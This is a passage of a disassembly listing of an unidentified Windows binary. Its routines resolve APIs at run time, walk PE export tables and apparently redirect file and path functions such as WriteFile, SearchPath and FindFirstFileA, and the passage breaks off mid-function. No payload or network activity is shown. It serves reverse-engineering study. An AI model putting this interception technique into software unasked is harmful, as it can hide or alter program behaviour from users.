mov eax, [ebp+var_3C]
jmp short loc_41CF8D
; ---------------------------------------------------------------------------
loc_41CF7B: ; DATA XREF: _4:00421598�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41CF8D: ; CODE XREF: sub_41CE67+65�j
; sub_41CE67+112�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_41CE67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF9E proc near ; DATA XREF: _5:004243A0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4215A0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_24]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CA0F
add esp, 18h
test eax, eax
jl short loc_41D005
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp loc_41D092
; ---------------------------------------------------------------------------
loc_41D005: ; CODE XREF: sub_41CF9E+4A�j
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jz short loc_41D041
push [ebp+arg_0]
call sub_41CD16
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_41D041
mov [ebp+arg_4], 1
push [ebp+var_1C]
call ds:dword_424698 ; GetModuleHandleA
test eax, eax
jnz short loc_41D041
push 8
push 0
push [ebp+var_1C]
call sub_41E170
loc_41D041: ; CODE XREF: sub_41CF9E+6F�j
; sub_41CF9E+81�j ...
and [ebp+var_20], 0
push offset dword_4215D4
push offset aCogetclassobje ; "CoGetClassObject"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_41D092
; ---------------------------------------------------------------------------
loc_41D080: ; DATA XREF: _4:004215A8�o
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41D092: ; CODE XREF: sub_41CF9E+62�j
; sub_41CF9E+E0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_41CF9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0A3 proc near ; CODE XREF: sub_41D112+9F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 80070057h
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov eax, [ebp+arg_0]
mov eax, [eax]
push [ebp+arg_0]
call dword ptr [eax+18h]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl short loc_41D10D
and [ebp+var_C], 0
push offset dword_4215F0
push offset aGetrecordinfof ; "GetRecordInfoFromTypeInfo"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41D106
push [ebp+arg_8]
push [ebp+var_4]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
jmp short loc_41D10D
; ---------------------------------------------------------------------------
loc_41D106: ; CODE XREF: sub_41D0A3+48�j
mov [ebp+var_8], 80004005h
loc_41D10D: ; CODE XREF: sub_41D0A3+2A�j
; sub_41D0A3+61�j
mov eax, [ebp+var_8]
leave
retn
sub_41D0A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D112 proc near ; DATA XREF: _5:off_4243A8�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push edi
mov [ebp+var_4], 80004005h
push [ebp+arg_0]
call sub_416BE0
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_41D1DB
and [ebp+var_10], 0
mov edi, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_18], ecx
push 208h
call sub_41BA4A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
mov ecx, 82h
xor eax, eax
mov edi, [ebp+var_14]
rep stosd
push 104h
push [ebp+var_14]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
push offset dword_4215F0
push offset aLoadtypelib ; "LoadTypeLib"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_14]
call [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jl short loc_41D1C7
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+var_10]
call sub_41D0A3
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
mov eax, [eax]
push [ebp+var_10]
call dword ptr [eax+8]
loc_41D1C7: ; CODE XREF: sub_41D112+94�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_41BACD
pop ecx
mov eax, [ebp+var_4]
jmp short loc_41D215
; ---------------------------------------------------------------------------
loc_41D1DB: ; CODE XREF: sub_41D112+1E�j
and [ebp+var_1C], 0
push offset dword_4215F0
push offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_41D210
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
jmp short loc_41D215
; ---------------------------------------------------------------------------
loc_41D210: ; CODE XREF: sub_41D112+E5�j
mov eax, 80004005h
loc_41D215: ; CODE XREF: sub_41D112+C7�j
; sub_41D112+FC�j
pop edi
leave
retn 18h
sub_41D112 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D21A proc near ; DATA XREF: _5:004243B0�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_8], 80004005h
push [ebp+arg_0]
call sub_416BE0
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41D293
push 208h
call sub_41BA4A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
push 104h
push [ebp+var_10]
push 0FFFFFFFFh
push [ebp+var_4]
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
push offset dword_4215F0
push offset aLoadtypelib ; "LoadTypeLib"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_10]
push [ebp+var_10]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_41BACD
pop ecx
loc_41D293: ; CODE XREF: sub_41D21A+1D�j
cmp [ebp+var_8], 0
jge short loc_41D2C2
push offset dword_4215F0
push offset aLoadregtypelib ; "LoadRegTypeLib"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_14], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_14]
mov [ebp+var_8], eax
loc_41D2C2: ; CODE XREF: sub_41D21A+7D�j
mov eax, [ebp+var_8]
leave
retn 14h
sub_41D21A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2C9 proc near ; CODE XREF: sub_41D300+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41D2EC
push [ebp+arg_4]
call ds:dword_4246DC ; LoadLibraryA
mov [ebp+var_8], eax
loc_41D2EC: ; CODE XREF: sub_41D2C9+15�j
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_4246A8 ; GetProcAddress
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_41D2C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D300 proc near ; CODE XREF: sub_41922D+16�p
; sub_41AB84+97�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D2C9
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41D32D
push ds:off_4214F0
push 30h
push ds:off_4214F4
call sub_41BB7C
loc_41D32D: ; CODE XREF: sub_41D300+18�j
mov eax, [ebp+var_4]
leave
retn
sub_41D300 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D332 proc near ; CODE XREF: sub_41D6FE+39�p
; DATA XREF: _5:off_424220�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_41D342
mov [ebp+arg_0], offset sub_41C317
loc_41D342: ; CODE XREF: sub_41D332+7�j
movzx eax, ds:byte_429030
test eax, eax
jnz short loc_41D358
push [ebp+arg_0]
call ds:dword_424710 ; SetUnhandledExceptionFilter
jmp short loc_41D368
; ---------------------------------------------------------------------------
loc_41D358: ; CODE XREF: sub_41D332+19�j
push offset sub_41C317
call ds:dword_424710 ; SetUnhandledExceptionFilter
mov eax, offset sub_41C317
loc_41D368: ; CODE XREF: sub_41D332+24�j
pop ebp
retn 4
sub_41D332 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D36C proc near ; CODE XREF: sub_41D579+108�p
; sub_41D579+15E�p
var_18 = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
and [ebp+var_8], 0
mov eax, [ebp+arg_4]
mov eax, [eax+18h]
dec eax
mov [ebp+var_4], eax
loc_41D380: ; CODE XREF: sub_41D36C:loc_41D401�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jg short loc_41D406
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+20h]
mov eax, [ebp+var_10]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
push eax
push [ebp+arg_8]
call sub_410F10
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41D3EB
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+24h]
mov eax, [ebp+var_10]
mov ax, [ecx+eax*2]
mov [ebp+var_18], ax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+1Ch]
movzx eax, [ebp+var_18]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
jmp short locret_41D408
; ---------------------------------------------------------------------------
loc_41D3EB: ; CODE XREF: sub_41D36C+4E�j
cmp [ebp+var_C], 0
jle short loc_41D3FA
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_8], eax
jmp short loc_41D401
; ---------------------------------------------------------------------------
loc_41D3FA: ; CODE XREF: sub_41D36C+83�j
mov eax, [ebp+var_10]
dec eax
mov [ebp+var_4], eax
loc_41D401: ; CODE XREF: sub_41D36C+8C�j
jmp loc_41D380
; ---------------------------------------------------------------------------
loc_41D406: ; CODE XREF: sub_41D36C+1A�j
xor eax, eax
locret_41D408: ; CODE XREF: sub_41D36C+7D�j
leave
retn
sub_41D36C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D40A proc near ; CODE XREF: sub_418780+12�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push offset dword_429018
call ds:dword_4246CC ; InitializeCriticalSection
push offset dword_428FF8
call ds:dword_4246CC ; InitializeCriticalSection
push 28h
call sub_41BA4A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41D449
push 83h
mov ecx, [ebp+var_8]
call sub_41EA57
mov [ebp+var_1C], eax
jmp short loc_41D44D
; ---------------------------------------------------------------------------
loc_41D449: ; CODE XREF: sub_41D40A+2B�j
and [ebp+var_1C], 0
loc_41D44D: ; CODE XREF: sub_41D40A+3D�j
mov eax, [ebp+var_1C]
mov ds:dword_429034, eax
push 28h
call sub_41BA4A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41D475
push 9
mov ecx, [ebp+var_C]
call sub_41EA57
mov [ebp+var_20], eax
jmp short loc_41D479
; ---------------------------------------------------------------------------
loc_41D475: ; CODE XREF: sub_41D40A+5A�j
and [ebp+var_20], 0
loc_41D479: ; CODE XREF: sub_41D40A+69�j
mov eax, [ebp+var_20]
mov ds:dword_429038, eax
push 28h
call sub_41BA4A
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_41D4A1
push 9
mov ecx, [ebp+var_10]
call sub_41EA57
mov [ebp+var_24], eax
jmp short loc_41D4A5
; ---------------------------------------------------------------------------
loc_41D4A1: ; CODE XREF: sub_41D40A+86�j
and [ebp+var_24], 0
loc_41D4A5: ; CODE XREF: sub_41D40A+95�j
mov eax, [ebp+var_24]
mov ds:dword_4248AC, eax
push 28h
call sub_41BA4A
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41D4CD
push 9
mov ecx, [ebp+var_14]
call sub_41EA57
mov [ebp+var_28], eax
jmp short loc_41D4D1
; ---------------------------------------------------------------------------
loc_41D4CD: ; CODE XREF: sub_41D40A+B2�j
and [ebp+var_28], 0
loc_41D4D1: ; CODE XREF: sub_41D40A+C1�j
mov eax, [ebp+var_28]
mov ds:dword_4248B4, eax
push 28h
call sub_41BA4A
pop ecx
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_41D4F9
push 9
mov ecx, [ebp+var_18]
call sub_41EA57
mov [ebp+var_2C], eax
jmp short loc_41D4FD
; ---------------------------------------------------------------------------
loc_41D4F9: ; CODE XREF: sub_41D40A+DE�j
and [ebp+var_2C], 0
loc_41D4FD: ; CODE XREF: sub_41D40A+ED�j
mov eax, [ebp+var_2C]
mov ds:dword_4248B0, eax
push offset dword_4215AC
push 2Bh
push offset off_424220
call sub_41D579
add esp, 0Ch
push offset dword_4215BC
push 2
push offset off_424378
call sub_41D579
add esp, 0Ch
push offset dword_4215C8
push 1
push offset off_424388
call sub_41D579
add esp, 0Ch
push offset dword_4215D4
push 3
push offset off_424390
call sub_41D579
add esp, 0Ch
push offset dword_4215F0
push 2
push offset off_4243A8
call sub_41D579
add esp, 0Ch
push offset dword_4215AC
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_4], eax
leave
retn
sub_41D40A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D579 proc near ; CODE XREF: sub_41D40A+107�p
; sub_41D40A+11B�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_4], 0
push [ebp+arg_8]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41D5A1
push [ebp+arg_8]
call ds:dword_4246DC ; LoadLibraryA
mov [ebp+var_10], eax
loc_41D5A1: ; CODE XREF: sub_41D579+1A�j
cmp [ebp+var_10], 0
jnz short loc_41D5BD
push ds:off_4214F0
push 0C9h
push ds:off_4214F4
call sub_41BB7C
loc_41D5BD: ; CODE XREF: sub_41D579+2C�j
push 1
push [ebp+var_10]
mov ecx, ds:dword_429038
call sub_41EC69
mov eax, [ebp+var_10]
and eax, 0FFFh
test eax, eax
jz short loc_41D5F5
mov eax, [ebp+var_10]
and ax, 0F000h
mov [ebp+var_8], eax
push 1
push [ebp+var_8]
mov ecx, ds:dword_429038
call sub_41EC69
jmp short loc_41D5FB
; ---------------------------------------------------------------------------
loc_41D5F5: ; CODE XREF: sub_41D579+5E�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
loc_41D5FB: ; CODE XREF: sub_41D579+7A�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
add ecx, [eax+3Ch]
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax], 4550h
jnz short loc_41D61E
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
loc_41D61E: ; CODE XREF: sub_41D579+97�j
and [ebp+var_14], 0
jmp short loc_41D62B
; ---------------------------------------------------------------------------
loc_41D624: ; CODE XREF: sub_41D579:loc_41D6B8�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_41D62B: ; CODE XREF: sub_41D579+A9�j
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_4]
jnb loc_41D6BD
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_10]
call ds:dword_4246A8 ; GetProcAddress
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_41D66B
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_18]
mov ecx, ds:dword_429034
call sub_41EC69
loc_41D66B: ; CODE XREF: sub_41D579+D8�j
cmp [ebp+var_4], 0
jz short loc_41D6B8
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_4]
push [ebp+var_8]
call sub_41D36C
add esp, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_18]
cmp eax, [ebp+var_1C]
jz short loc_41D6B8
cmp [ebp+var_1C], 0
jz short loc_41D6B8
cmp [ebp+var_18], 0
jz short loc_41D6B8
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_1C]
mov ecx, ds:dword_429034
call sub_41EC69
loc_41D6B8: ; CODE XREF: sub_41D579+F6�j
; sub_41D579+119�j ...
jmp loc_41D624
; ---------------------------------------------------------------------------
loc_41D6BD: ; CODE XREF: sub_41D579+B8�j
cmp [ebp+arg_8], offset dword_4215AC
jnz short locret_41D6F0
cmp [ebp+var_4], 0
jz short locret_41D6F0
push offset aWritefile ; "WriteFile"
push [ebp+var_4]
push [ebp+var_8]
call sub_41D36C
add esp, 0Ch
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short locret_41D6F0
mov eax, [ebp+var_20]
mov ds:dword_42473C, eax
locret_41D6F0: ; CODE XREF: sub_41D579+14B�j
; sub_41D579+151�j ...
leave
retn
sub_41D579 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6F2 proc near ; CODE XREF: _3:00411735�p
push ebp
mov ebp, esp
push 0
call sub_41D6FE
pop ebp
retn
sub_41D6F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6FE proc near ; CODE XREF: sub_41D6F2+5�p
; DATA XREF: _5:00424268�o
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4219A0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_429018
call ds:dword_424644 ; RtlEnterCriticalSection
mov ds:byte_429030, 1
push 0
call sub_41D332
and [ebp+var_4], 0
call sub_41A8B3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D76E
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 1
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D76A
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41D76A: ; CODE XREF: sub_41D6FE+5F�j
or [ebp+var_4], 0FFFFFFFFh
loc_41D76E: ; CODE XREF: sub_41D6FE+4B�j
mov [ebp+var_4], 2
call sub_4182B0
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D7A3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D79F
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41D79F: ; CODE XREF: sub_41D6FE+94�j
or [ebp+var_4], 0FFFFFFFFh
loc_41D7A3: ; CODE XREF: sub_41D6FE+80�j
mov [ebp+var_4], 4
push [ebp+arg_0]
call ds:dword_424648 ; ExitProcess
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D7EC
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 5
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D7D8
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41D7D8: ; CODE XREF: sub_41D6FE+CD�j
push [ebp+arg_0]
call ds:dword_424664 ; GetCurrentProcess
push eax
call ds:dword_424718 ; TerminateProcess
or [ebp+var_4], 0FFFFFFFFh
loc_41D7EC: ; CODE XREF: sub_41D6FE+B9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_41D6FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D7FD proc near ; DATA XREF: _5:00424330�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push offset dword_4215AC
push offset aSearchpatha ; "SearchPathA"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_41D843
push 0
xor edx, edx
mov ecx, [ebp+arg_4]
call sub_415867
test eax, eax
jz short loc_41D843
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_424688 ; GetFullPathNameA
jmp short locret_41D858
; ---------------------------------------------------------------------------
loc_41D843: ; CODE XREF: sub_41D7FD+20�j
; sub_41D7FD+30�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_4]
locret_41D858: ; CODE XREF: sub_41D7FD+44�j
leave
retn 18h
sub_41D7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D85C proc near ; DATA XREF: _5:00424328�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4219E8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_41D8CC
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
loc_41D8CC: ; CODE XREF: sub_41D85C+35�j
cmp [ebp+arg_0], 0
jnz short loc_41D909
push 0
xor edx, edx
mov ecx, [ebp+var_20]
call sub_415867
test eax, eax
jz short loc_41D909
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_42468C ; GetFullPathNameW
push 0FFFFFFFFh
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_41D959
; ---------------------------------------------------------------------------
loc_41D909: ; CODE XREF: sub_41D85C+74�j
; sub_41D85C+84�j
push offset dword_4215AC
push offset aSearchpathw ; "SearchPathW"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_1C], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_41D959
; ---------------------------------------------------------------------------
loc_41D947: ; DATA XREF: _4:004219F0�o
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41D959: ; CODE XREF: sub_41D85C+AB�j
; sub_41D85C+E9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_41D85C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D96A proc near ; DATA XREF: _5:004242C0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41365E
test eax, eax
jnz short loc_41D990
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424650 ; FindFirstFileA
mov [ebp+var_4], eax
loc_41D990: ; CODE XREF: sub_41D96A+15�j
mov eax, [ebp+var_4]
leave
retn 8
sub_41D96A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D997 proc near ; DATA XREF: _5:004242C8�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
